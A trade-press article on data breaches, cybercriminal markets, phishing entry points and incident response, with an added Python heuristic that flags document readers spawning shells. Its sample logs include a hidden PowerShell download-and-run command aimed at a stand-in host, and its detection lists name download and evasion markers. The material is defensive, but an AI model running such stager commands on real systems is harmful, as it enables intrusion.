"Data breach" is one of the most feared phrases in the English language today: a breach can expose valuable information and cost the targeted business millions of dollars to rectify. And surprisingly, executing a breach is cheap – a $20 piece of malware can cause tremendous losses for organizations.
According to a recent IBM/Ponemon study, it costs organizations about $150 for each record lost or stolen in a breach; in addition, the average consolidated total cost of a data breach in 2014 was $3.8 million, which represents a 23% increase since 2013.
What's more, 317 million new pieces of malware, computer viruses or other malicious software were created in 2014, according to Verizon's 2015 Data Breach Investigations Report. So who are the masterminds behind the attacks?
"Not the geniuses that people usually imagine when they think of hackers," Ondrej Krehel, founder/principal of cybersecurity intelligence firm LIFARS, stated. "Most hackers are not sophisticated at all."
For example, these Russian individuals (pictured left), who operated a large botnet (photo courtesy of LIFARS), were not that computer-savvy. The majority of cybercriminals are either part of an organized crime ring or a small group looking to make a quick buck, he said. Crime rings generally use more sophisticated malware that is custom-developed for them or purchased on the Dark Web, and they tend to operate out of Eastern Europe, Russia, Africa and China. Individuals or small groups involved in cybercrime typically purchase exploit kits or subscribe to ready-to-use platforms.
Most cybercriminals are after money, and especially in poorer regions of the world, cybercrime is a lucrative business, Krehel said.
"The laws are loose, and most of the time they do not have to worry about getting prosecuted, which further motivates them," Krehel said.
For example, there is no extradition law in Russia, making the country a safe haven for cybercriminals.
"Besides money, cybercriminals are often after personal information that can be sold or abused for fraudulent purposes," Krehel said. "This includes credit card numbers, addresses and social security numbers."
Cybercriminals frequently resell this information instead of using it themselves to lower the risk of getting caught, he added.
What's frightening for targeted businesses is that malware groups now operate like businesses. Cybercriminals advertise and distribute malware-as-a-service as if it were legitimate commercial software. They also use crime packs with business intelligence reporting dashboards to manage the distribution of their malicious code. Exploit kits come with technical installation guides, how-to videos and even technical support.
"There is a very active underground market where suppliers and buyers of malicious software, personal information, networks of already infected computers, and basically anything you would need for a successful cyberattack, find each other," Kevin Jonkers, forensics and incident response manager at the Amsterdam, Netherlands-based cyber intelligence firm Fox-IT, explained.
For the most advanced attacks, it is not uncommon for criminals to hire a skilled hacker to write custom malware crafted to compromise a specific victim, he said. That means that even without the technical skills required to carry out a cybercrime, with the right amount of money, anyone can become a successful cybercriminal.
"Given the ease of remaining anonymous while perpetrating these crimes, one can imagine how attractive this world is to the modern-day criminal," Jonkers said.
Financial institutions are desirable targets for hackers these days, and platforms such as the now defunct AlienSpy allow cybercriminals with no or minimal computer skills to carry out attacks that can cause great damage to financial institutions. AlienSpy, a Remote Access Trojan (RAT) platform often deployed through phishing campaigns, charged a monthly service fee of just $19.99 to $219.99 and gave criminals the ability to steal large sums of money, Krehel explained.
"The platform allowed users to share successful targets with each other, so an institution that was successfully breached might see several dozen instances of the same type of attack taking place at the same time but by different attackers," he said.
Jonkers added that criminals use a variety of techniques to breach an organization's IT infrastructure, and if they're very persistent, they are very likely to succeed at some point.
"An attacker that targets your organization will usually go through several stages to breach your infrastructure," he said. "After gathering information about its target, a determined hacker will usually deploy an attack using the methods that are most likely to succeed."
These methods can range from using simple, easily detectable tools, to advanced malware that is designed to remain undetected for long periods of time.
An attacker that wants to target a specific organization will usually perform extensive reconnaissance in order to identify the target's weak points – in most cases, those weak points are Internet-facing systems or the systems used on employees' laptops and desktop computers.
Data breaches tend to start with phishing emails aimed at tricking users into either giving up their credentials or opening a file containing an exploit that downloads malware onto the computer. "These methods are not very sophisticated, but they are extremely effective," Krehel noted.
The malicious program gives the attacker full control over the employee's system and acts as an entry point into the IT network. From there, the hacker will attempt to gather more access rights and search through the network for interesting information.
Jonkers gave an example where an HR employee received a response from a job seeker to an open position. The email had a resume attached, but by opening the resume, the employee installed a malicious program.
"From this point, the attacker had inside access to the IT network of his target," Jonkers said. "For several days, the attacker combed through the network for the crown jewels of the organization, in this case, medical intellectual property."
Several months after the breach, that highly valued intellectual property was up for sale on the black market.
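The resume scenario above follows a pattern that is visible in endpoint telemetry: a document reader (Word, Acrobat) launched by the user suddenly spawns a shell or script interpreter, which then fetches or runs a second-stage program. The detection heuristic below is an added example written for this page, not code from the article or from LIFARS or Fox-IT. The log lines are constructed in a simplified key="value" form loosely modelled on process-creation events; the field names, the host `example.invalid`, the file paths and the scoring weights are all assumptions.

```python
"""Triage process-creation events for the phishing-attachment chain
described in the article: document reader -> shell/script interpreter -> download.

Added example; log format, field names and weights are assumptions."""
import re
from typing import Dict, List, Tuple

# Parent processes whose normal job is only to render documents.
DOCUMENT_READERS = {"winword.exe", "excel.exe", "powerpnt.exe", "acrord32.exe", "outlook.exe"}
# Children a document reader rarely has a legitimate reason to spawn.
SUSPICIOUS_CHILDREN = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                       "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# Command-line fragments typical of a stager pulling a second stage from the Internet.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "http://", "https://")
# Flags used to keep the interpreter invisible to the user at the keyboard.
HIDDEN_MARKERS = ("-w hidden", "-windowstyle hidden", "-enc ", "-encodedcommand", "-nop")
USER_TEMP = "\\appdata\\local\\temp\\"
ALERT_THRESHOLD = 3

# Constructed sample events (not real telemetry).
SAMPLE_LOGS = [
    # 1. HR user opens the attached "resume": Explorer launching Word is normal.
    'EventID=1 User="CORP\\hr.user" ParentImage="C:\\Windows\\explorer.exe" '
    'Image="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
    'CommandLine="WINWORD.EXE /n C:\\Users\\hr.user\\Downloads\\resume.doc"',
    # 2. The document then spawns a hidden PowerShell that downloads a second stage.
    'EventID=1 User="CORP\\hr.user" '
    'ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadString(\'http://example.invalid/stage2\')"',
    # 3. An administrator running PowerShell interactively: must not alert.
    'EventID=1 User="CORP\\it.admin" ParentImage="C:\\Windows\\explorer.exe" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell.exe Get-Service -Name Spooler"',
    # 4. A PDF reader launching cmd.exe to run a binary dropped in the user's temp folder.
    'EventID=1 User="CORP\\hr.user" ParentImage="C:\\Program Files\\Adobe\\Reader\\AcroRd32.exe" '
    'Image="C:\\Windows\\System32\\cmd.exe" '
    'CommandLine="cmd.exe /c C:\\Users\\hr.user\\AppData\\Local\\Temp\\~svc.exe"',
]

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> Dict[str, str]:
    """Parse key="value" / key=value pairs into a dict."""
    return {k: (q if q else u) for k, q, u in KV_RE.findall(line)}


def basename(path: str) -> str:
    """Case-insensitive file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: Dict[str, str]) -> Tuple[int, List[str]]:
    """Return (score, reasons). Each rule is independent; the weights are assumptions."""
    parent = basename(ev.get("ParentImage", ""))
    image = basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "").lower()
    score, reasons = 0, []
    if parent in DOCUMENT_READERS and image in SUSPICIOUS_CHILDREN:
        score += 3
        reasons.append(f"document reader {parent} spawned {image}")
    if image in SUSPICIOUS_CHILDREN and any(m in cmd for m in DOWNLOAD_MARKERS):
        score += 2
        reasons.append("interpreter command line downloads from the Internet")
    if image in SUSPICIOUS_CHILDREN and any(m in cmd for m in HIDDEN_MARKERS):
        score += 1
        reasons.append("interpreter started hidden or with encoded arguments")
    if USER_TEMP in cmd:
        score += 1
        reasons.append("command references the user's temp directory")
    return score, reasons


def triage(lines: List[str], threshold: int = ALERT_THRESHOLD) -> List[Dict[str, object]]:
    """Return one alert per event whose score reaches the threshold, in log order."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"user": ev.get("User"), "parent": basename(ev.get("ParentImage", "")),
                           "image": basename(ev.get("Image", "")), "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in triage(SAMPLE_LOGS):
        print(f"[score {a['score']}] {a['user']}: {a['parent']} -> {a['image']} ({'; '.join(a['reasons'])})")
```

Run over the constructed events, only the two attachment-driven launches alert (the Word-to-PowerShell download scores 6, the Acrobat-to-cmd launch scores 4); the user opening the resume and the administrator's interactive PowerShell stay silent. The parent/child rule carries most of the weight because it is the step an attacker cannot avoid once the lure is a document, while the download and hidden-window rules only add confidence, which keeps ordinary admin use of the same interpreters below the threshold.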
So what takes place after a data breach? Krehel said that once the forensic team arrives, the investigation starts; its primary objectives are to limit access to compromised systems, understand the attacker's profile (whether state-sponsored or financially motivated), secure evidence and plan steps for future evidence preservation.
"A damage assessment of the business and technological areas reveals how deeply the attacker was able to penetrate the network and laterally move into compromised network systems," Krehel said.
While the forensic teams investigate, executives will follow the data breach plan and prepare the public relations, privacy and legal actions needed.
"This is not an easy task – the wrong message can trigger an avalanche of negative actions and sanctions," Krehel advised.
Jonkers added that after a data breach, a Computer Emergency Response Team is often called in to lead the investigation and mitigation of the incident. Larger organizations might have their own CERT, but small- to medium-sized organizations usually rely on external CERTs. Making a skilled and trained CERT available is of paramount importance for efficient incident handling.
"If your organization is not able to support its own CERT, make sure to have an external CERT on standby and preferably, on retainer," Jonkers added.
Krehel noted, "A data breach is a C-suite exercise, and tests the coherence and conciseness of the incident response preparedness of the enterprise to function in crisis mode. Unfortunately, it is mostly a live exercise, not a simulated test, and real learning comes at a price."
© 2025 ALM Global, LLC, All Rights Reserved.